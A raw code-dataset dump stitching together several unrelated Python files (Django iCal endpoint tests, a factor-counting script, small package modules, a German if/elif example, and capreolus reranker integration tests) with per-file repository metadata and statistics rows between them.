            self.assertEqual(ical_event['dtstart'].dt.tzinfo, utc)
            self.assertEqual(ical_event['dtend'].dt.tzinfo, utc)
            self.assertEqual(str(ical_event['summary']), self.activity.title)
            self.assertEqual(
                str(ical_event['description']),
                '{}\n{}\nJoin: {}'.format(
                    self.activity.description,
                    self.activity.get_absolute_url(),
                    self.slot.online_meeting_url
                )
            )
            self.assertEqual(ical_event['url'], self.activity.get_absolute_url())
            self.assertEqual(ical_event['organizer'], 'MAILTO:{}'.format(self.activity.owner.email))

    def test_get_no_signature(self):
        response = self.client.get(self.unsigned_url)
        self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)

    def test_get_wrong_signature(self):
        response = self.client.get('{}?signature=ewiorjewoijical_url'.format(self.unsigned_url))
        self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)


class DateIcalTestCase(BluebottleTestCase):
    def setUp(self):
        super().setUp()
        self.activity = DateActivityFactory.create(
            title='Pollute Katwijk Beach',
            slots=[]
        )
        self.slots = DateActivitySlotFactory.create_batch(
            3,
            activity=self.activity,
            is_online=True,
            online_meeting_url='http://example.com'
        )
        self.user = BlueBottleUserFactory.create()
        self.client = JSONAPITestClient()
        self.activity_url = reverse('date-detail', args=(self.activity.pk,))

        response = self.client.get(self.activity_url, user=self.user)
        self.signed_url = response.json()['data']['attributes']['links']['ical']
        self.unsigned_url = reverse('slot-ical', args=(self.activity.pk,))

    def test_get_applied_to_all(self):
        DateParticipantFactory.create(activity=self.activity, user=self.user)
        response = self.client.get(self.signed_url)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.get('content-type'), 'text/calendar')
        self.assertEqual(
            response.get('content-disposition'),
            'attachment; filename="{}.ics"'.format(self.activity.slug)
        )

        calendar = icalendar.Calendar.from_ical(response.content)
        self.assertEqual(len(calendar.walk('vevent')), 3)

        for index, ical_event in enumerate(calendar.walk('vevent')):
            slot = self.slots[index]
            self.assertAlmostEqual(
                ical_event['dtstart'].dt,
                slot.start,
                delta=timedelta(seconds=10)
            )
            self.assertAlmostEqual(
                ical_event['dtend'].dt,
                slot.start + slot.duration,
                delta=timedelta(seconds=10)
            )
            self.assertEqual(ical_event['dtstart'].dt.tzinfo, utc)
            self.assertEqual(ical_event['dtend'].dt.tzinfo, utc)
            self.assertEqual(str(ical_event['summary']), self.activity.title)
            self.assertEqual(
                str(ical_event['description']),
                '{}\n{}\nJoin: {}'.format(
                    self.activity.description,
                    self.activity.get_absolute_url(),
                    slot.online_meeting_url
                )
            )
            self.assertEqual(ical_event['url'], self.activity.get_absolute_url())
            self.assertEqual(ical_event['organizer'], 'MAILTO:{}'.format(self.activity.owner.email))

    def test_get_applied_to_first(self):
        self.activity.slot_selection = 'free'
        self.activity.save()
        participant = DateParticipantFactory.create(activity=self.activity, user=self.user)
        SlotParticipantFactory.create(slot=self.slots[0], participant=participant)

        response = self.client.get(self.signed_url)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.get('content-type'), 'text/calendar')
        self.assertEqual(
            response.get('content-disposition'),
            'attachment; filename="{}.ics"'.format(self.activity.slug)
        )

        calendar = icalendar.Calendar.from_ical(response.content)
        self.assertEqual(len(calendar.walk('vevent')), 1)

        slot = self.slots[0]
        ical_event = list(calendar.walk('vevent'))[0]
        self.assertAlmostEqual(
            ical_event['dtstart'].dt,
            slot.start,
            delta=timedelta(seconds=10)
        )
        self.assertAlmostEqual(
            ical_event['dtend'].dt,
            slot.start + slot.duration,
            delta=timedelta(seconds=10)
        )
        self.assertEqual(ical_event['dtstart'].dt.tzinfo, utc)
        self.assertEqual(ical_event['dtend'].dt.tzinfo, utc)
        self.assertEqual(str(ical_event['summary']), self.activity.title)
        self.assertEqual(
            str(ical_event['description']),
            '{}\n{}\nJoin: {}'.format(
                self.activity.description,
                self.activity.get_absolute_url(),
                slot.online_meeting_url
            )
        )
        self.assertEqual(ical_event['url'], self.activity.get_absolute_url())
        self.assertEqual(ical_event['organizer'], 'MAILTO:{}'.format(self.activity.owner.email))

    def test_get_no_signature(self):
        response = self.client.get(self.unsigned_url)
        self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)

    def test_get_wrong_signature(self):
        response = self.client.get('{}?signature=ewiorjewoijical_url'.format(self.unsigned_url))
        self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)


class SkillApiTestCase(BluebottleTestCase):
    def setUp(self):
        super().setUp()
        MemberPlatformSettings.objects.update(closed=True)
        self.url = reverse('skill-list')
        Skill.objects.all().delete()
        self.skill = SkillFactory.create_batch(40)
        self.client = JSONAPITestClient()

    def test_get_skills_authenticated(self):
        user = BlueBottleUserFactory.create()
        response = self.client.get(self.url, user=user)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.data['results']), 40)

    def test_get_skills_unauthenticated(self):
        response = self.client.get(self.url)
        self.assertEqual(response.status_code, 401)

    def test_get_skills_old_url(self):
        old_url = reverse('assignment-skill-list')
        user = BlueBottleUserFactory.create()
        response = self.client.get(old_url, user=user)
        self.assertEqual(response.status_code, 200)


# factor.py (kumaraditya303/General-Programs, MIT license)
] | null | null | null |
x = int(input("Enter A Number = "))
y = 0
if x > 1:
    for i in range(1, x + 1):
        if x % i == 0:
            print("Factor = ", str(i))
            y += 1
    if y == 2:
        print(str(x) + " is a Prime Number.")
    else:
        print("Number of Factors of " + str(x) + " = " + str(y) + ".")
if x == 0:
    print("You entered 0.")
if x == -1:
    print("-1 is a Unique Number.")
if x == 1:
    print("1 is a Unique Number.")
if x < -1:
    for i in range(-1, x - 1, -1):
        if x % i == 0:
            print("Factor = ", str(i))
            y += 1
    if y == 2:
        print(str(x) + " is a Prime Number.")
    else:
        print("Number of Factors of " + str(x) + " = " + str(y) + ".")
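The script above counts divisors by trial division and treats a count of exactly two as prime. A minimal reusable sketch of the same idea (the function names are my own, not part of the repo):

```python
def count_factors(x: int) -> int:
    """Count the positive divisors of |x| by trial division."""
    n = abs(x)
    return sum(1 for i in range(1, n + 1) if n % i == 0)


def is_prime(x: int) -> bool:
    # Exactly two positive divisors (1 and |x|) means prime,
    # matching the y == 2 check in the script above.
    return count_factors(x) == 2


print(count_factors(12))  # 12 has divisors 1, 2, 3, 4, 6, 12
```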
| 26.518519 | 63 | 0.414804 | 115 | 716 | 2.582609 | 0.226087 | 0.070707 | 0.053872 | 0.03367 | 0.855219 | 0.855219 | 0.855219 | 0.855219 | 0.855219 | 0.855219 | 0 | 0.047404 | 0.381285 | 716 | 26 | 64 | 27.538462 | 0.623025 | 0 | 0 | 0.538462 | 0 | 0 | 0.26087 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.346154 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
95ca4a8215829b5a1f64f36a1c01705f54856374 | 106 | py | Python | darwinpush/messages/TrainAlertMessage.py | fasteroute/darwinpush | c919049e076cbdf61007fc9cc1c5a0271cde7929 | [
"Apache-2.0"
] | 3 | 2015-08-15T15:38:06.000Z | 2019-08-06T11:09:32.000Z | darwinpush/messages/TrainAlertMessage.py | grundleborg/darwinpush | c919049e076cbdf61007fc9cc1c5a0271cde7929 | [
"Apache-2.0"
] | 34 | 2015-07-22T13:47:16.000Z | 2015-08-12T17:40:23.000Z | darwinpush/messages/TrainAlertMessage.py | grundleborg/darwinpush | c919049e076cbdf61007fc9cc1c5a0271cde7929 | [
"Apache-2.0"
] | 1 | 2015-08-30T15:26:24.000Z | 2015-08-30T15:26:24.000Z |
from darwinpush.messages.BaseMessage import BaseMessage


class TrainAlertMessage(BaseMessage):
    pass
| 15.142857 | 55 | 0.820755 | 10 | 106 | 8.7 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132075 | 106 | 6 | 56 | 17.666667 | 0.945652 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
95dd358365310ad36ff330c1e2b912dcf2b55ea9 | 40 | py | Python | src/polyoligo/__main__.py | MirkoLedda/polyoligo | c9fc952fbc7315f426a137313fb36cd16a5e5957 | [
"BSD-2-Clause"
] | 3 | 2019-07-26T20:09:50.000Z | 2022-01-11T00:56:45.000Z | src/polyoligo/__main__.py | MirkoLedda/polyoligo | c9fc952fbc7315f426a137313fb36cd16a5e5957 | [
"BSD-2-Clause"
] | 1 | 2021-04-21T13:27:45.000Z | 2021-04-21T13:27:45.000Z | src/polyoligo/__main__.py | MirkoLedda/polyoligo | c9fc952fbc7315f426a137313fb36cd16a5e5957 | [
"BSD-2-Clause"
] | 2 | 2020-02-10T22:34:15.000Z | 2022-03-01T21:29:01.000Z |
from . import cli_kasp

cli_kasp.main()
| 10 | 22 | 0.75 | 7 | 40 | 4 | 0.714286 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15 | 40 | 3 | 23 | 13.333333 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
95f9c06e3b805cccea1b33ccbe2dde50fc48b8bb | 47 | py | Python | lyricsgenius/types/__init__.py | JordanPCF/LyricsGenius | eb8c6b3fb3ba12eb8420cf93739959720a5d6def | [
"MIT"
] | null | null | null | lyricsgenius/types/__init__.py | JordanPCF/LyricsGenius | eb8c6b3fb3ba12eb8420cf93739959720a5d6def | [
"MIT"
] | null | null | null | lyricsgenius/types/__init__.py | JordanPCF/LyricsGenius | eb8c6b3fb3ba12eb8420cf93739959720a5d6def | [
"MIT"
] | null | null | null |
from .base import Stats
from .song import Song
| 15.666667 | 23 | 0.787234 | 8 | 47 | 4.625 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.170213 | 47 | 2 | 24 | 23.5 | 0.948718 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2501195a9dbe21ca1a90874cdad6e9da67a22b29 | 132 | py | Python | Verzweigungen/Mehrfach/mehrfach.py | DietrichPaul/Einstieg-in-Python | 0d28402f962773274d85e6bb169ae631c91f66ce | [
"CC0-1.0"
] | null | null | null | Verzweigungen/Mehrfach/mehrfach.py | DietrichPaul/Einstieg-in-Python | 0d28402f962773274d85e6bb169ae631c91f66ce | [
"CC0-1.0"
] | null | null | null | Verzweigungen/Mehrfach/mehrfach.py | DietrichPaul/Einstieg-in-Python | 0d28402f962773274d85e6bb169ae631c91f66ce | [
"CC0-1.0"
] | null | null | null |
x = -5
print("x:", x)

if x > 0:
    print("x ist positiv")
elif x < 0:
    print("x ist negativ")
else:
    print("x ist gleich 0")
| 14.666667 | 27 | 0.537879 | 25 | 132 | 2.84 | 0.44 | 0.338028 | 0.380282 | 0.225352 | 0.309859 | 0 | 0 | 0 | 0 | 0 | 0 | 0.041667 | 0.272727 | 132 | 8 | 28 | 16.5 | 0.697917 | 0 | 0 | 0 | 0 | 0 | 0.318182 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
253cac1c22a02bad771b13717f545e8db1aed32d | 11,808 | py | Python | capreolus/tests/test_integration.py | bpiwowar/capreolus-xpm | 5374eb48df96b54d51365fc32441ae50a3e634c2 | [
"Apache-2.0"
] | null | null | null | capreolus/tests/test_integration.py | bpiwowar/capreolus-xpm | 5374eb48df96b54d51365fc32441ae50a3e634c2 | [
"Apache-2.0"
] | null | null | null | capreolus/tests/test_integration.py | bpiwowar/capreolus-xpm | 5374eb48df96b54d51365fc32441ae50a3e634c2 | [
"Apache-2.0"
] | null | null | null |
"""
Integration tests. Trains different rerankers from scratch.
"""
import json
import os

import pytest
from pymagnitude import Magnitude

from capreolus import train
from capreolus import train_pipeline, evaluate_pipeline
from capreolus.collection import COLLECTIONS
from capreolus.demo_app.utils import search_files_or_folders_in_directory
from capreolus.extractor.deeptileextractor import DeepTileExtractor
from capreolus.extractor.embedtext import EmbedText
from capreolus.pipeline import Pipeline
from capreolus.reranker.KNRM import KNRM
from capreolus.utils.loginit import get_logger

logger = get_logger(__name__)  # pylint: disable=invalid-name

def test_knrm(monkeypatch, tmpdir):
    monkeypatch.setenv("CAPREOLUS_RESULTS", str(os.path.join(tmpdir, "results")))
    monkeypatch.setenv("CAPREOLUS_CACHE", str(os.path.join(tmpdir, "cache")))

    def fake_magnitude_embedding(*args, **kwargs):
        return Magnitude(None)

    pipeline = Pipeline({"reranker": "KNRM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})
    pipeline.ex.main(train.train)
    monkeypatch.setattr(train, "pipeline", pipeline)
    monkeypatch.setattr(EmbedText, "get_magnitude_embeddings", fake_magnitude_embedding)
    pipeline.ex.run(config_updates={"reranker": "KNRM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})
    logger.info("Base path is {0}".format(pipeline.base_path))

    config_files = search_files_or_folders_in_directory(pipeline.base_path, "config.json")
    assert len(config_files) == 1
    config_file = json.load(open(config_files[0], "rt"))
    assert config_file["reranker"] == "KNRM"
    assert config_file["niters"] == 1

    run_path = os.path.join(pipeline.reranker_path, pipeline.cfg["fold"])
    weight_dir = os.path.join(run_path, "weights")
    weight_file = search_files_or_folders_in_directory(weight_dir, "dev")
    assert len(weight_file) == 1

def test_convknrm(monkeypatch, tmpdir):
    monkeypatch.setenv("CAPREOLUS_RESULTS", str(os.path.join(tmpdir, "results")))
    monkeypatch.setenv("CAPREOLUS_CACHE", str(os.path.join(tmpdir, "cache")))

    def fake_magnitude_embedding(*args, **kwargs):
        return Magnitude(None)

    pipeline = Pipeline({"reranker": "ConvKNRM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})
    pipeline.ex.main(train.train)
    monkeypatch.setattr(train, "pipeline", pipeline)
    monkeypatch.setattr(EmbedText, "get_magnitude_embeddings", fake_magnitude_embedding)
    pipeline.ex.run(config_updates={"reranker": "ConvKNRM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})
    logger.info("Base path is {0}".format(pipeline.base_path))

    config_files = search_files_or_folders_in_directory(pipeline.base_path, "config.json")
    assert len(config_files) == 1
    config_file = json.load(open(config_files[0], "rt"))
    assert config_file["reranker"] == "ConvKNRM"
    assert config_file["niters"] == 1

    run_path = os.path.join(pipeline.reranker_path, pipeline.cfg["fold"])
    weight_dir = os.path.join(run_path, "weights")
    weight_file = search_files_or_folders_in_directory(weight_dir, "dev")
    assert len(weight_file) == 1

def test_drmm(monkeypatch, tmpdir):
    monkeypatch.setenv("CAPREOLUS_RESULTS", str(os.path.join(tmpdir, "results")))
    monkeypatch.setenv("CAPREOLUS_CACHE", str(os.path.join(tmpdir, "cache")))

    def fake_magnitude_embedding(*args, **kwargs):
        return Magnitude(None)

    pipeline = Pipeline({"reranker": "DRMM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})
    pipeline.ex.main(train.train)
    monkeypatch.setattr(train, "pipeline", pipeline)
    monkeypatch.setattr(EmbedText, "get_magnitude_embeddings", fake_magnitude_embedding)
    pipeline.ex.run(config_updates={"reranker": "DRMM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})
    logger.info("Base path is {0}".format(pipeline.base_path))

    config_files = search_files_or_folders_in_directory(pipeline.base_path, "config.json")
    assert len(config_files) == 1
    config_file = json.load(open(config_files[0], "rt"))
    assert config_file["reranker"] == "DRMM"
    assert config_file["niters"] == 1

    run_path = os.path.join(pipeline.reranker_path, pipeline.cfg["fold"])
    weight_dir = os.path.join(run_path, "weights")
    weight_file = search_files_or_folders_in_directory(weight_dir, "dev")
    assert len(weight_file) == 1

def test_positdrmm(monkeypatch, tmpdir):
    monkeypatch.setenv("CAPREOLUS_RESULTS", str(os.path.join(tmpdir, "results")))
    monkeypatch.setenv("CAPREOLUS_CACHE", str(os.path.join(tmpdir, "cache")))

    def fake_magnitude_embedding(*args, **kwargs):
        return Magnitude(None)

    pipeline = Pipeline({"reranker": "POSITDRMM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})
    pipeline.ex.main(train.train)
    monkeypatch.setattr(train, "pipeline", pipeline)
    monkeypatch.setattr(EmbedText, "get_magnitude_embeddings", fake_magnitude_embedding)
    pipeline.ex.run(config_updates={"reranker": "POSITDRMM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})
    logger.info("Base path is {0}".format(pipeline.base_path))

    config_files = search_files_or_folders_in_directory(pipeline.base_path, "config.json")
    assert len(config_files) == 1
    config_file = json.load(open(config_files[0], "rt"))
    assert config_file["reranker"] == "POSITDRMM"
    assert config_file["niters"] == 1

    run_path = os.path.join(pipeline.reranker_path, pipeline.cfg["fold"])
    weight_dir = os.path.join(run_path, "weights")
    weight_file = search_files_or_folders_in_directory(weight_dir, "dev")
    assert len(weight_file) == 1

def test_dssm_trigram(monkeypatch, tmpdir):
    monkeypatch.setenv("CAPREOLUS_RESULTS", str(os.path.join(tmpdir, "results")))
    monkeypatch.setenv("CAPREOLUS_CACHE", str(os.path.join(tmpdir, "cache")))

    def fake_magnitude_embedding(*args, **kwargs):
        return Magnitude(None)

    pipeline = Pipeline({"reranker": "DSSM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1, "datamode": "trigram"})
    pipeline.ex.main(train.train)
    monkeypatch.setattr(train, "pipeline", pipeline)
    pipeline.ex.run(config_updates={"reranker": "DSSM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})

    config_files = search_files_or_folders_in_directory(pipeline.base_path, "config.json")
    assert len(config_files) == 1
    config_file = json.load(open(config_files[0], "rt"))
    assert config_file["reranker"] == "DSSM"
    assert config_file["niters"] == 1

    run_path = os.path.join(pipeline.reranker_path, pipeline.cfg["fold"])
    weight_dir = os.path.join(run_path, "weights")
    weight_file = search_files_or_folders_in_directory(weight_dir, "dev")
    assert len(weight_file) == 1

def test_deeptilebar(monkeypatch, tmpdir):
    monkeypatch.setenv("CAPREOLUS_RESULTS", str(os.path.join(tmpdir, "results")))
    monkeypatch.setenv("CAPREOLUS_CACHE", str(os.path.join(tmpdir, "cache")))

    def fake_magnitude_embedding(*args, **kwargs):
        return Magnitude(None)

    monkeypatch.setattr(DeepTileExtractor, "get_magnitude_embeddings", fake_magnitude_embedding)
    pipeline = Pipeline(
        {"reranker": "DeepTileBar", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1, "passagelen": "3"}
    )
    pipeline.ex.main(train.train)
    monkeypatch.setattr(train, "pipeline", pipeline)
    pipeline.ex.run(config_updates={"reranker": "DeepTileBar", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})

    config_files = search_files_or_folders_in_directory(pipeline.base_path, "config.json")
    assert len(config_files) == 1
    config_file = json.load(open(config_files[0], "rt"))
    assert config_file["reranker"] == "DeepTileBar"
    assert config_file["niters"] == 1

    run_path = os.path.join(pipeline.reranker_path, pipeline.cfg["fold"])
    weight_dir = os.path.join(run_path, "weights")
    weight_file = search_files_or_folders_in_directory(weight_dir, "dev")
    assert len(weight_file) == 1

def test_train_api(monkeypatch, tmpdir):
    monkeypatch.setenv("CAPREOLUS_RESULTS", str(os.path.join(tmpdir, "results")))
    monkeypatch.setenv("CAPREOLUS_CACHE", str(os.path.join(tmpdir, "cache")))

    def fake_magnitude_embedding(*args, **kwargs):
        return Magnitude(None)

    monkeypatch.setattr(EmbedText, "get_magnitude_embeddings", fake_magnitude_embedding)
    pipeline = train_pipeline({"reranker": "KNRM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})
    assert pipeline.reranker.__class__ == KNRM

    ndcg_vals = evaluate_pipeline(pipeline)
    assert ndcg_vals == [0.6309297535714575]

def test_train_api_early_stopping(monkeypatch, tmpdir):
    monkeypatch.setenv("CAPREOLUS_RESULTS", str(os.path.join(tmpdir, "results")))
    monkeypatch.setenv("CAPREOLUS_CACHE", str(os.path.join(tmpdir, "cache")))

    def fake_magnitude_embedding(*args, **kwargs):
        return Magnitude(None)

    monkeypatch.setattr(EmbedText, "get_magnitude_embeddings", fake_magnitude_embedding)
    pipeline = train_pipeline(
        {"reranker": "KNRM", "niters": 5, "benchmark": "dummy", "itersize": 1, "batch": 1}, early_stopping=True
    )
    assert pipeline.reranker.__class__ == KNRM

    ndcg_vals = evaluate_pipeline(pipeline)
    assert ndcg_vals == [0.6309297535714575]

def test_api_data_sources(monkeypatch, tmpdir):
    monkeypatch.setenv("CAPREOLUS_RESULTS", str(os.path.join(tmpdir, "results")))
    monkeypatch.setenv("CAPREOLUS_CACHE", str(os.path.join(tmpdir, "cache")))

    fake_qrels_path = os.path.join(tmpdir, "fake_qrels.txt")
    with open(fake_qrels_path, "w") as fp:
        qrels = "301 0 LA010189-0001 0\n301 0 LA010189-0002 1"
        fp.write(qrels)

    def fake_magnitude_embedding(*args, **kwargs):
        return Magnitude(None)

    monkeypatch.setattr(EmbedText, "get_magnitude_embeddings", fake_magnitude_embedding)
    pipeline = train_pipeline(
        {"reranker": "KNRM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1}, {"qrels": fake_qrels_path}
    )
    assert pipeline.reranker.__class__ == KNRM

    ndcg_vals = evaluate_pipeline(pipeline)
    # The ndcg score changed since the retrieved order is now the best order
    assert ndcg_vals == [1.0]
# This test should be placed at the very end. Setting is_large_collection will mess up other tests
# TODO: Fix this? Simple fix: set dummy_collection.is_large_collection = False after the test
# def test_knrm_for_is_large_collection(monkeypatch, tmpdir):
#     monkeypatch.setenv("CAPREOLUS_RESULTS", str(os.path.join(tmpdir, "results")))
#
#     def fake_magnitude_embedding(*args, **kwargs):
#         return Magnitude(None)
#
#     pipeline = Pipeline({"reranker": "KNRM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})
#     pipeline.ex.main(train.train)
#     COLLECTIONS["dummy"].is_large_collection = True
#     monkeypatch.setattr(train, "pipeline", pipeline)
#     monkeypatch.setattr(EmbedText, "get_magnitude_embeddings", fake_magnitude_embedding)
#     pipeline.ex.run(config_updates={"reranker": "KNRM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})
#     logger.info("Is collection large? : {0}".format(pipeline.collection.is_large_collection))
#
#     config_files = search_files_or_folders_in_directory(pipeline.base_path, "config.json")
#     assert len(config_files) == 1
#     config_file = json.load(open(config_files[0], "rt"))
#     assert config_file["reranker"] == "KNRM"
#     assert config_file["niters"] == 1
#
#     run_path = os.path.join(pipeline.reranker_path, pipeline.cfg["fold"])
#     weight_dir = os.path.join(run_path, "weights")
#     weight_file = search_files_or_folders_in_directory(weight_dir, "dev")
#     assert len(weight_file) == 1
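The per-reranker tests above repeat one body and differ only in the reranker name. A sketch of how `pytest.mark.parametrize` could collapse that duplication; the `make_config` helper and test name below are illustrative, not part of the capreolus API:

```python
import pytest

RERANKERS = ["KNRM", "ConvKNRM", "DRMM", "POSITDRMM"]


def make_config(reranker):
    # Shared one-iteration config used by every test in this file.
    return {"reranker": reranker, "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1}


@pytest.mark.parametrize("reranker", RERANKERS)
def test_reranker_trains(reranker, monkeypatch, tmpdir):
    # The body would mirror test_knrm above, with `reranker`
    # substituted into the Pipeline config and assertions.
    cfg = make_config(reranker)
    assert cfg["reranker"] == reranker
```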
| 45.068702 | 130 | 0.714431 | 1,499 | 11,808 | 5.407605 | 0.097398 | 0.025167 | 0.041944 | 0.039477 | 0.851221 | 0.851221 | 0.843819 | 0.837404 | 0.837404 | 0.837404 | 0 | 0.014859 | 0.139397 | 11,808 | 261 | 131 | 45.241379 | 0.782818 | 0.137195 | 0 | 0.684211 | 0 | 0 | 0.175613 | 0.018911 | 0 | 0 | 0 | 0.003831 | 0.175439 | 1 | 0.105263 | false | 0.005848 | 0.076023 | 0.052632 | 0.233918 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |